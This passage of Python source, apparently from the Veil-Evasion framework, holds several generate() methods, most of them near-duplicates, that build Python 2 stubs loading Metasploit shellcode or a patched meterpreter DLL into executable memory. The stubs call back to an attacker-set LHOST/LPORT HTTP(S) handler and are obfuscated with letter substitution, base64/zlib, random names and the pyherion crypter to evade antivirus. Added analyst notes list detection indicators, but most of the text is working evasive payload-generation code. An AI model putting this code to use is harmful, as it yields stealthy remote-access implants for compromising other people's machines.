    PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
    PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
    PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
    PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
    # A timeout of -1 is INFINITE: the script blocks until the thread exits.
    PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        PayloadCode = crypters.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Return the source text of a Python script that carries a patched metsrv.dll.

    Reads ``metsrv.dll`` from the Metasploit install, overwrites fixed
    placeholder regions in it (header, user agent, transport, handler URL and
    two timeouts), then compresses and encodes it with ``helpers.deflate``.
    The emitted script inflates the blob, casts it to a function pointer and
    calls it.

    Analyst note: the user-agent string is a fixed literal, and the handler
    URL has the shape ``https://<LHOST>:<LPORT>/<checksum>_<16 random chars>/``.
    Both are stable network-side indicators for payloads built here.
    NOTE(review): this variant reads the ``use_encrypter`` option; sibling
    generators on this page read ``use_pyherion``. Confirm which key the
    option table defines.
    """
    metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
    f = open(metsrvPath, 'rb')
    meterpreterDll = f.read()
    f.close()
    # Overwrite len(s) bytes of dll starting at ind; total length is unchanged.
    dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]
    # 48-byte replacement for the start of the DLL. It still begins with the
    # "MZ" magic (0x4d 0x5a); the remaining bytes are not interpreted here.
    headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
    headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
    headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
    meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
    # Overwrite the METERPRETER_UA placeholder with a fixed user-agent string.
    userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
    userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
    meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)
    # Overwrite the METERPRETER_TRANSPORT_SSL marker with the HTTPS transport name.
    sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
    sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
    meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
    # Overwrite the 256-"X" URL placeholder with the handler URL built from
    # the LHOST/LPORT options, genHTTPChecksum() and a 16-char random suffix.
    urlIndex = meterpreterDll.index("https://" + ("X" * 256))
    urlString = "https://" + self.required_options['LHOST'][0] + ":" + str( self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum( ) + "_" + randomizer.randomString(16) + "/\x00"
    meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
    # Overwrite the expiration-timeout marker (0xb64be661) with 604800.
    # The original comment said 300; 604800 seconds is 7 days.
    expirationTimeoutIndex = meterpreterDll.index( struct.pack('<I', 0xb64be661))
    expirationTimeout = struct.pack('<I', 604800)
    meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
    # Overwrite the communication-timeout marker (0xaf79257f) with 300.
    communicationTimeoutIndex = meterpreterDll.index( struct.pack('<I', 0xaf79257f))
    communicationTimeout = struct.pack('<I', 300)
    meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
    # Compress and base64-encode the DLL (per the original comment; the
    # emitted script reverses it with b64decode and zlib.decompress(..., -15)).
    compressedDll = helpers.deflate(meterpreterDll)
    # Build the emitted script.
    payloadCode = ""
    # This variant always uses the void-pointer cast loader.
    payloadCode += "from ctypes import *\nimport base64,zlib\n"
    randInflateFuncName = randomizer.randomString()
    randb64stringName = randomizer.randomString()
    randVarName = randomizer.randomString()
    # Emitted inflate helper: base64-decode, then raw-deflate decompress.
    payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
    payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
    payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
    randVarName = randomizer.randomString()
    randFuncName = randomizer.randomString()
    payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
    # The emitted script casts the inflated bytes to a function pointer and calls it.
    payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
    payloadCode += randFuncName + "()\n"
    if self.required_options["use_encrypter"][0].lower() == "y":
        payloadCode = crypters.pyherion(payloadCode)
    return payloadCode
def generate(self):
    """Return the source text of a Python script that carries a patched metsrv DLL.

    Reads ``metsrv.x86.dll`` if present, else ``metsrv.dll``, from the
    Metasploit install. Overwrites fixed placeholder regions in it (header,
    user agent, transport, handler URL and two timeouts), then compresses and
    encodes it with ``helpers.deflate``. The ``inject_method`` option selects
    the loader in the emitted script: ``"void"`` casts the inflated bytes to a
    function pointer; anything else uses VirtualAlloc, RtlMoveMemory,
    CreateThread and WaitForSingleObject. If ``use_pyherion`` is ``"y"`` the
    text is passed through ``crypters.pyherion`` (defined elsewhere).

    Analyst note: the user-agent string is a fixed literal, and the handler
    URL has the shape ``https://<LHOST>:<LPORT>/<checksum>_<16 random chars>/``.
    Both are stable network-side indicators for payloads built here.
    """
    # Prefer the x86-specific DLL name when the install provides it.
    if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
        metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
    else:
        metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
    f = open(metsrvPath, 'rb')
    meterpreterDll = f.read()
    f.close()
    # Overwrite len(s) bytes of dll starting at ind; total length is unchanged.
    dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
    # 48-byte replacement for the start of the DLL. It still begins with the
    # "MZ" magic (0x4d 0x5a); the remaining bytes are not interpreted here.
    headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
    headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
    headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
    meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
    # Overwrite the METERPRETER_UA placeholder with a fixed user-agent string.
    userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
    userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
    meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
    # Overwrite the METERPRETER_TRANSPORT_SSL marker with the HTTPS transport
    # name. The original comment said "turn off SSL", which does not match
    # the HTTPS string written here.
    sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
    sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
    meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
    # Overwrite the 256-"X" URL placeholder with the handler URL built from
    # the LHOST/LPORT options, genHTTPChecksum() and a 16-char random suffix.
    urlIndex = meterpreterDll.index("https://" + ("X" * 256))
    urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
    meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
    # Overwrite the expiration-timeout marker (0xb64be661) with 604800.
    # The original comment said 300; 604800 seconds is 7 days.
    expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
    expirationTimeout = struct.pack('<I', 604800)
    meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
    # Overwrite the communication-timeout marker (0xaf79257f) with 300.
    communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
    communicationTimeout = struct.pack('<I', 300)
    meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
    # Compress and base64-encode the DLL (per the original comment; the
    # emitted script reverses it with b64decode and zlib.decompress(..., -15)).
    compressedDll = helpers.deflate(meterpreterDll)
    # Build the emitted script.
    payloadCode = ""
    # Void-pointer loader: cast the inflated bytes to a function pointer.
    if self.required_options["inject_method"][0].lower() == "void":
        payloadCode += "from ctypes import *\nimport base64,zlib\n"
        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()
        # Emitted inflate helper: base64-decode, then raw-deflate decompress.
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        randVarName = randomizer.randomString()
        randFuncName = randomizer.randomString()
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
    # VirtualAlloc loader.
    else:
        payloadCode += 'import ctypes,base64,zlib\n'
        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()
        randPtr = randomizer.randomString()
        randBuf = randomizer.randomString()
        randHt = randomizer.randomString()
        # Emitted inflate helper: base64-decode, then raw-deflate decompress.
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
        payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
        payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # A timeout of -1 is INFINITE: the script blocks until the thread exits.
        payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        payloadCode = crypters.pyherion(payloadCode)
    return payloadCode
def generate(self):
    """Return the source text of a Python 2 script that un-substitutes and loads shellcode.

    One random hex letter (a-f) in the escaped shellcode text is replaced by
    one random non-hex letter before embedding. The emitted script holds both
    letters, applies the reverse translation and decodes the escapes. The
    ``inject_method`` option selects the loader: ``"virtual"`` emits
    VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject;
    anything else emits ``create_string_buffer`` plus a cast to
    ``CFUNCTYPE(c_void_p)``. If ``use_pyherion`` is ``"y"`` the text is passed
    through ``crypters.pyherion`` (defined elsewhere) before it is returned.

    Analyst note: both substitution letters are written into the emitted
    script as one-character string literals, so the text layer can be reversed
    statically. The loader calls are unaffected by it.
    """
    # Random letter substitution variables.
    hex_letters = "abcdef"
    # "x" is absent from this list, presumably so the "\x" escape prefix
    # survives the reverse translation; confirm intent.
    non_hex_letters = "ghijklmnopqrstuvwyz"
    encode_with_this = random.choice(hex_letters)
    decode_with_this = random.choice(non_hex_letters)
    # Generate shellcode (per the original comment, via msfvenom).
    Shellcode = self.shellcode.generate()
    # Random identifiers used inside the emitted script.
    subbed_shellcode_variable_name = randomizer.randomString()
    shellcode_variable_name = randomizer.randomString()
    rand_ptr = randomizer.randomString()
    rand_buf = randomizer.randomString()
    rand_ht = randomizer.randomString()
    rand_decoded_letter = randomizer.randomString()
    rand_correct_letter = randomizer.randomString()
    rand_sub_scheme = randomizer.randomString()
    # string.maketrans is Python 2 only; maps the hex letter to the non-hex one.
    sub_scheme = string.maketrans(encode_with_this, decode_with_this)
    # Escape the shellcode so it can sit inside a double-quoted literal.
    Shellcode = Shellcode.encode("string_escape")
    if self.required_options["inject_method"][0].lower() == "virtual":
        # Build the emitted script line by line.
        payload_code = 'import ctypes\n'
        payload_code += 'from string import maketrans\n'
        payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
        payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
        # The emitted table maps the non-hex letter back to the hex letter.
        payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
        payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
        payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
        payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
        payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
        payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
        payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # A timeout of -1 is INFINITE: the script blocks until the thread exits.
        payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
        if self.required_options["use_pyherion"][0].lower() == "y":
            payload_code = crypters.pyherion(payload_code)
        return payload_code
    else:
        # Additional random identifiers for the cast-based loader.
        # NOTE(review): rand_reverse_shell is generated but never used.
        rand_reverse_shell = randomizer.randomString()
        rand_memory_shell = randomizer.randomString()
        rand_shellcode = randomizer.randomString()
        # Build the emitted script line by line.
        payload_code = 'from ctypes import *\n'
        payload_code += 'from string import maketrans\n'
        payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
        payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
        # The emitted table maps the non-hex letter back to the hex letter.
        payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
        payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
        payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
        payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
        # The emitted script casts a ctypes string buffer to a function
        # pointer and calls it; no VirtualAlloc call appears in this variant.
        payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
        payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
        payload_code += rand_shellcode + '()'
        if self.required_options["use_pyherion"][0].lower() == "y":
            payload_code = crypters.pyherion(payload_code)
        return payload_code
def generate(self):
    """Return the source text of a Python 2 stub embedding a patched metsrv DLL (HTTPS transport).

    Reads ``metsrv.x86.dll`` (falling back to ``metsrv.dll``) from under
    ``settings.METASPLOIT_PATH``, overwrites fixed-size placeholder regions in
    the image (header, user agent, transport name, handler URL, two timeout
    words), compresses the result with ``helpers.deflate`` and wraps it in a
    ctypes loader stub. ``inject_method == "void"`` emits the ``CFUNCTYPE``
    cast variant; any other value emits the VirtualAlloc / RtlMoveMemory /
    CreateThread variant. When ``use_pyherion`` is "y" the text is passed
    through ``crypters.pyherion`` (defined elsewhere).

    Every ``.index()`` below raises ``ValueError`` if its marker is not present
    in the DLL that was read. The str/bytes mixing assumes Python 2.

    Review note (detection): the patched image carries a fixed User-Agent
    string and a handler URL of the form
    ``https://<LHOST>:<LPORT>/<checksum>_<16 random chars>/``; both are static
    shapes usable as network indicators. The stub itself is recognisable by a
    base64 + ``zlib.decompress(..., -15)`` helper feeding a ctypes call.
    """
    if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
        metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
    else:
        metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

    # NOTE(review): the handle is not closed if read() raises; a with-block would be safer
    f = open(metsrvPath, "rb")
    meterpreterDll = f.read()
    f.close()

    # helper used for patching metsrv.dll: overwrites len(s) bytes at offset
    # ind, so the image length is unchanged
    dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]

    # patch the metsrv.dll header: 48 bytes written at offset 0, beginning with
    # the "MZ" magic (\x4d\x5a); the meaning of the remaining bytes is not
    # established by this file
    headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
    headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
    headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
    meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

    # patch in the default user agent string (fixed value, NUL-terminated)
    userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
    userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
    meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)

    # overwrite the METERPRETER_TRANSPORT_SSL marker with the HTTPS transport name
    sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
    sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
    meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

    # replace the URL/port of the handler; the placeholder is "https://" plus 256 'X'
    urlIndex = meterpreterDll.index("https://" + ("X" * 256))
    urlString = (
        "https://"
        + self.required_options["LHOST"][0]
        + ":"
        + str(self.required_options["LPORT"][0])
        + "/"
        + self.genHTTPChecksum()
        + "_"
        + randomizer.randomString(16)
        + "/\x00"
    )
    meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

    # replace the expiration-timeout placeholder word with 604800
    # (units are not shown here; presumably seconds, i.e. 7 days)
    expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
    expirationTimeout = struct.pack("<I", 604800)
    meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)

    # replace the communication-timeout placeholder word with 300
    communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
    communicationTimeout = struct.pack("<I", 300)
    meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)

    # compress/encode the dll; helpers.deflate is defined elsewhere, and the
    # stub reverses it with base64 + raw deflate (wbits=-15)
    compressedDll = helpers.deflate(meterpreterDll)

    # actually build out the payload
    payloadCode = ""

    # traditional void pointer injection
    if self.required_options["inject_method"][0].lower() == "void":

        # doing void * cast
        payloadCode += "from ctypes import *\nimport base64,zlib\n"

        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()

        # inflate helper emitted into the stub
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
        payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

        randVarName = randomizer.randomString()
        randFuncName = randomizer.randomString()

        payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
        # the inflated bytes are cast to a function pointer and called
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName + "()\n"

    # VirtualAlloc() injection
    else:

        payloadCode += "import ctypes,base64,zlib\n"

        randInflateFuncName = randomizer.randomString()
        randb64stringName = randomizer.randomString()
        randVarName = randomizer.randomString()
        randPtr = randomizer.randomString()
        randBuf = randomizer.randomString()
        randHt = randomizer.randomString()

        # inflate helper emitted into the stub
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
        payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"

        payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE (RWX region)
        payloadCode += (
            randPtr
            + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
            + randVarName
            + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
        )
        payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
        payloadCode += (
            "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
            + randPtr
            + "),"
            + randBuf
            + ",ctypes.c_int(len("
            + randVarName
            + ")))\n"
        )
        payloadCode += (
            randHt
            + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
            + randPtr
            + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
        )
        # c_int(-1) is the INFINITE timeout
        payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"

    if self.required_options["use_pyherion"][0].lower() == "y":
        payloadCode = crypters.pyherion(payloadCode)

    return payloadCode
def generate(self):
    """Return the source text of a Python 2 ctypes stub carrying letter-substituted shellcode.

    The shellcode from ``self.shellcode.generate()`` is rendered with the
    Python 2 ``string_escape`` codec; one random hex letter (a-f) is then
    replaced by one random non-hex letter before the text is embedded. The
    emitted stub undoes the replacement with ``maketrans`` / ``translate``.

    ``inject_method == "virtual"`` selects the VirtualAlloc / RtlMoveMemory /
    CreateThread stub; any other value selects the ``create_string_buffer`` +
    ``CFUNCTYPE`` cast stub. ``use_pyherion == "y"`` passes the result through
    ``crypters.pyherion`` (defined elsewhere).

    Review note (detection): both substitution letters appear in the stub as
    plain one-character string assignments ahead of a ``maketrans`` call, so
    the encoding is reversible from the script text. Run-time behaviour (RWX
    allocation and thread creation, or calling a cast data buffer) is not
    altered by the substitution.
    """
    # Random letter substitution variables
    hex_letters = "abcdef"
    non_hex_letters = "ghijklmnopqrstuvwyz"  # note: 'x' is absent from this alphabet
    encode_with_this = random.choice(hex_letters)
    decode_with_this = random.choice(non_hex_letters)

    # Obtain the shellcode (per the original comment, generated via msfvenom)
    Shellcode = self.shellcode.generate()

    # Random identifiers for the variables named in the emitted stub
    subbed_shellcode_variable_name = randomizer.randomString()
    shellcode_variable_name = randomizer.randomString()
    rand_ptr = randomizer.randomString()
    rand_buf = randomizer.randomString()
    rand_ht = randomizer.randomString()
    rand_decoded_letter = randomizer.randomString()
    rand_correct_letter = randomizer.randomString()
    rand_sub_scheme = randomizer.randomString()

    # Generator-side table: hex letter -> non-hex letter (string.maketrans is Python 2 only)
    sub_scheme = string.maketrans(encode_with_this, decode_with_this)

    # Render the raw bytes as an escaped string literal body (Python 2 codec)
    Shellcode = Shellcode.encode("string_escape")

    if self.required_options["inject_method"][0].lower() == "virtual":
        # Create Payload File
        payload_code = 'import ctypes\n'
        payload_code += 'from string import maketrans\n'
        # The stub holds both letters and builds the reverse table (non-hex -> hex)
        payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
        payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
        payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
        payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n'
        payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
        payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
        # a read-write-execute allocation, a common behavioural detection signal
        payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
        payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
        payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # c_int(-1) is the INFINITE timeout: the stub blocks on the new thread
        payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            payload_code = crypters.pyherion(payload_code)

        return payload_code

    else:
        # Additional random variable names
        rand_reverse_shell = randomizer.randomString()  # drawn but not used below
        rand_memory_shell = randomizer.randomString()
        rand_shellcode = randomizer.randomString()

        # Create Payload File
        payload_code = 'from ctypes import *\n'
        payload_code += 'from string import maketrans\n'
        payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
        payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
        payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
        payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n'
        payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
        payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
        # The stub casts a ctypes string buffer to a function pointer and calls it,
        # i.e. it executes a data buffer as code
        payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
        payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
        payload_code += rand_shellcode + '()'

        if self.required_options["use_pyherion"][0].lower() == "y":
            payload_code = crypters.pyherion(payload_code)

        return payload_code
def generate(self):
    """Return the source text of a Python 2 stub embedding a patched metsrv DLL (HTTP transport).

    Reads ``metsrv.dll`` from under ``veil.METASPLOIT_PATH``, overwrites
    fixed-size placeholder regions in the image (header, user agent, transport
    name, handler URL, two timeout words), compresses it with
    ``helpers.deflate`` and wraps it in a stub that inflates the bytes and
    calls them through a ``CFUNCTYPE`` cast. When ``use_encrypter`` is "y" the
    text is passed through ``crypters.pyherion`` (defined elsewhere).

    Every ``.index()`` below raises ``ValueError`` if its marker is not present
    in the DLL that was read. The str/bytes mixing assumes Python 2.

    Review note (detection): the transport is plain HTTP, so the fixed
    User-Agent and the URL shape
    ``http://<LHOST>:<LPORT>/<checksum>_<16 random chars>/`` are visible on the
    wire without TLS inspection.
    """
    metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

    # NOTE(review): the handle is not closed if read() raises; a with-block would be safer
    f = open(metsrvPath, 'rb')
    meterpreterDll = f.read()
    f.close()

    # helper used for patching metsrv.dll: overwrites len(s) bytes at offset
    # ind, so the image length is unchanged
    dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

    # patch the metsrv.dll header: 48 bytes written at offset 0, beginning with
    # the "MZ" magic (\x4d\x5a); the meaning of the remaining bytes is not
    # established by this file
    headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
    headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
